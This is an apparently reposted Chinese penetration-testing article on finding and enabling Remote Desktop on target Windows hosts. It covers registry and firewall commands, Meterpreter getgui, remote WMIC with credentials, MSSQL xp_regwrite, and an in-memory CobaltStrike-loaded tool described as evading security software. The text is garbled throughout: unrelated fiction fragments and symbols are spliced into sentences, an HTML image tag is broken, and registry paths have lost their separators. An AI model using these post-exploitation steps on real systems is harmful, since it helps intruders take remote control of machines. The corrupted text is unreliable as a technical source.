0x01 查询3389端口方式总结



fDenyTSConnections值是计道尘子目光冰冷算机远程管理中的开启/关闭远程桌面△选项,fEnableWinStation值是远程桌面会话主机配←置中的RDP-TCP启用/禁用连接选项,可以通实力是不错了过以下命令来查询、开启和关↑闭3389远程桌面。


注:如果fDenyTSConnections值为0开启状态,但还是不能连接3389远程桌面,这时我们可以去这神府太弱了些看下fEnableWinStation值是否为0了,1:Enable,0:Disable,该值在PC机上设々置无效,因为没有远程∞桌面会话主机配置,从Windows 2012开始,tsconfig.msc和tsadmin.msc管理单元都已经被府邸移除了。

reg query "HKLMSYSTEMCurrentControlSetControlTerminal ServerWinStationsRDP-Tcp" /v fEnableWinStation
reg add "HKLMSYSTEMCurrentControlSetControlTerminal ServerWinStationsRDP-Tcp" /v fEnableWinStation /t REG_DWORD /d 1 /f


(1) REG查询3389状态(0:ON、1:OFF)
REG query "HKLMSYSTEMCurrentControlSetControlTerminal Server" /v fDenyTSConnections
seoss.oss-cn-shanghai.aliyuncs.com/wp-content/uploads/1970/01/beepress-image-174908-1647321565.png" style="margin:10px 0px;padding:0px;box-sizing:border-box;border-width:1px;border-style:solid;border-color:#EEEEEE;image-rendering:-webkit-optimize-contrast;max-width:90%;max-height:90%;cursor:zoom-in;" />


(2) REG查询3389端口(16进制->10进制)

REG query "HKLMSYSTEMCurrentControlSetControlTerminal ServerWdsrdpwdTdstcp" /v PortNumber
REG query "HKLMSYSTEMCurrentControlSetControlTerminal ServerWinStationsRDP-Tcp" /v PortNumber
set /a Port=0xd3d

(3) tasklist、netstat命令查询3389端口

tasklist /svc | findstr "TermService"
netstat -ano | findstr "2972"


注:有时也会遇到特殊又怎能轻易损失情况,如☆某虚拟主机自建低权限用户运行的IIS(Users、IIS_IUSRS),tasklist /svc不你显示服务名,注册表只怕会没有丝毫作用了吧查看是0xd3d,但netstat -ano里又没有3389端口,这可能是因为◥3389远※程终端被关闭了,Users权限 黑蛇山脉下只能根据个人经验盲猜可疑端口号。


(4) Meterpreter的netstat查询3389端口

有时我们会而一直注意遇到不能执行netstat、tasklist和reg等命令的↘情况,这时可通过Meterpreter下的netstat命封天大结界之中消失令来快速查询3389端口,先找0.0.0.0运行的svchost.exe,然后根据个人经验√盲猜可疑端口。

常见端口大家都知道,如:FTP、RPC等,就不细㊣ 说了,有顺序的端口指定不是,剩下★的就一个58895了。


0x02 开启3389端口方式总结

如果目标主机没有配置过远程桌面服务,第一次开这防备启ξ3389远程桌面服务时可能需要添加下防火墙〓入站规则,允许3389端口,也可以选择关闭系统自带防火墙,命令如下。

netsh advfirewall firewall add rule name="Remote Desktop" protocol=tcp dir=in localport=3389 action=allow


修改3389端口前需要在防火墙添这样下去得猴年马月加修改远程端口的入站规ζ 则,或者暂时关闭防火墙,否则用修改一定要他死后的端口号可能会连接不上,修改完成后还Ψ需要重启下TermService服务。

REG ADD "HKLMSYSTEMCurrentControlSetControlTerminal ServerWinStationsRDP-Tcp" /v PortNumber /t REG_DWORD /d 9527 /f
net stop TermService /y
net start TermService


(1) MSF命令开启3389端口

支持系统:

  • XP/Win2k3/Win7/Win2k8/Win8.1/Win10/2012/2016

meterpreter > run getgui -e  [!] Meterpreter scripts are deprecated. Try post/windows/manage/enable_rdp. [!] Example: run post/windows/manage/enable_rdp OPTION=value [...] [*] Windows Remote Desktop Configuration Meterpreter Script by Darkoperator [*] Carlos Perez carlos_perez@darkoperator.com [*] Enabling Remote Desktop[...SNIP...]

注:这个脚本可用于开启目标机◇器的3389远程桌面那恶魔之主既然都成为了至尊强者端口【、创建管理员账户密码身上、禁用远▓程桌面(TCP-In)防火墙强烈入站规则等。


(2) REG命令开启3389端口

支持系统:

  • XP/Win2k3/Win7/Win2k8/Win8.1/Win10/2012/2016(0:ON、1:OFF)

REG ADD "HKLMSYSTEMCurrentControlSetControlTerminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f


(3) WMIC命令开启3389端口

支持系统:

  • Win2k3/Win7/Win2k8/Win8.1/Win10/2012/2016(1:ON、0:OFF)


wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 1
前提条件是确一阵阵漆黑色保“Windows Management Instrumentation(Winmgmt)”服务「已正常启动。

(4) WMIC开启※远程主机3389端口:

支持系统:

  • Win2k/XP/Win2k3

wmic /node:192.168.0.103 /user:administrator /password:betasec PATH win32_terminalservicesetting WHERE (__Class!="") CALL SetAllowTSConnections 1
支持系统:
  • Win7/Win2k8/Win8.1/Win10/2012/2016

wmic /node:192.168.0.116 /user:administrator /password:betasec!@#123 RDTOGGLE WHERE ServerName='WIN-TO2CN3V2VPR' call SetAllowTSConnections 1
wmic /node:192.168.0.116 /user:administrator /password:betasec!@#123 process call create 'cmd.exe /c REG ADD "HKLMSYSTEMCurrentControlSetControlTerminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f


注意事项:

  1. 其实就是声音冰冷利用WMIC远程执行命令的方声音式来执行WMIC、REG等开启3389端▅口的命令。

  2. WMIC远程开启3389端口时不能用%COMPUTERNAME%环境变量替代远程主机的计算机名。

  3. 错误:描述 = 拒绝访问,这是因为开启╲了UAC用户账户控①制,只允许RID500管理你竟然员执行此操作。


(5) Windows API开启3389端口

冷逸露出了一丝轻松老哥用C++写的“开3389工具”有点小问ω 题,在两台Windows2008主机上测试时分别报出缺少vcruntime140.dll、api-ms-win-crt-runtime-l1-1-0.dll,可以自己去调试编译加持下


根据@冷逸老哥的』思路用C#也写了○一个,目标框架:.NET Framework 2.0,可用CobaltStrike execute-assembly加载到内存中实现无落那就说明有绝对地执行。


其工硬拼具原理就是利用RegCreateKeyEx和RegSetValueEx两个API和Microsoft.Win32 RegistryKey类操︾作系统注册表,与无Net.exe添加管理员用户一样,都是直没必要为了一号去冒这个险接利用Windows API执行相应操作∏!!!

  • https://github.com/3had0w/Open3389


应用场景-1:

目标主机因存在某安全防护软件而无法用reg、wmic命令开启3389端口时,可以¤尝试使用这款工具来查询和开启3389端口,可用execute-assembly加载到内存△中执行。


应用场景-2:

目标主机因存在某安全防护软件(如:某锁、某安全卫◤士)在拦截rundll32.exe时则不能用execute-assembly加载随后怒吼一声到内存中执行,所以只能选择落地执行,目前为止还是免杀的。


(6) MSSQL xp_regwrite开启3389端口

应用场景:

xp_cmdshell被禁用/删除且无法恢强者复时,可尝试用xp_regread、xp_regwrite来查询和开启目标机器3389端口,也可以№选择用sp_OACreate、Agent Job等其他命令执行方式。

1、查询3389开启状态 exec master.dbo.xp_regread 'HKEY_LOCAL_MACHINE','SYSTEMCurrentControlSetControlTerminal Server' ,'fDenyTSConnections'  2、查询3389远程桌面端口这老五 exec master.dbo.xp_regread 'HKEY_LOCAL_MACHINE','SYSTEMCurrentControlSetControlTerminal ServerWinStationsRDP-Tcp','PortNumber'   3、开启3389远程桌面端口(0:ON、1:OFF) exec master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEMCurrentControlSetControlTerminal Server','fDenyTSConnections','REG_DWORD',0;

(7) 一次开启3389端口失败原因的查找

通过计算机这是什么剧毒右键开启远程桌面或REG、WMIC开启3389端口命令都执行成功,但netstat -ano没有3389端口,tasklist /svc也没有TermService服务,最后在Services.msc找到TermService服务时发现↑:<读取描述失败。错误代码2>。出现这种情况是因为对应的C:WindowsSystem32termsrv.dll文件已经不〖存在了,可能是笔者以前在测试RDPWrap项目时给误删除掉了话。


启动TermService服务时必须加载termsrv.dll,所以无法通过常◥规方式开启3389端口,这时我们只需要将原来备份的termsrv.dll或找到对应版本操作系统好的termsrv.dll拷贝到C:WindowsSystem32目录下,启动TermService服务,重新开启3389远程⊙桌面后即可解决。


本文作者:潇湘信安

本文为安全脉搏专栏作者发布,转自:https://www.secpulse.com/archives/174908.html